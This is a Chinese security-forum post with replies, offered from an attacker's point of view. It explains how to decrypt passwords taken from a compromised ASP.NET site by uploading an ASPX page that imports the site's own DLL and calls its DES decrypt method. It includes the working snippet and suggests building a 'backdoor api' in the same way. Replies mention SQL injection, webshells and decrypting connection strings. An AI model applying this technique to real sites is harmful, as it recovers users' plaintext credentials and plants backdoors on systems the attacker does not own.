Aspx下调用DLL加解密思路
如果大家觉得有用就请管理转板块我只是稍微说一下非常简单
另一个角度来说我觉得大家都知道但好像是没人提过
一个童靴遇到一个问题 正常情况下遇到Password加密 首先去bin下下载dll
反编译加密算法 找类似加密的算法 比如RSA AES DES
然后重编译代码或者用公开加密代码进行解密
可偏偏人家是变异的加密算法
加解密不一致 且有时候进行全库加密 有什么快捷的方法
===========>资源阅读
pass为类base64编码
通过下载bin反编译dll 可知为des
通用解密算法登录失败
================
解决方法很简单
找到目标的函数 直接复制到命名空间
ASPX
<%@ Import namespace="Library.Util.DESBase64" %>
<%@ Page Language="Jscript"%>
<%Response.Write('Unknown_decode[>'+Library.Util.DESBase64.Decrypt("eFM0rW****g==")+'<]</br>');%>
完成解密 如果你想调用其他函数也是同理写个backdoor api什么的
评论10次
思路确实不错,数据库连接语句加密的也能采用此方法解密.
支持原创
支持原创
很多时候 注入只拿到帐户加密后的密码,就蛋疼了
我通常是直接找朋友编译.net程序,调用它的解密函数再解密 貌似你这样更方便啊 找个webshell就好了
viewstate可以解密哦也
aspx的加密 本来就头疼的 注入时遇到这个问题 我都直接放弃了 shell都还没拿到 更加拿不到dll文件
有DLL反编译解密算法倒不是太大问题。问题就出在比如坚难的注入到PASSWORD 且无法update 又应该如何操作呢 有些站会员表和管理表加密算法还不一样。蛋疼
思路不错,直接调用 原有资源
不错的思路!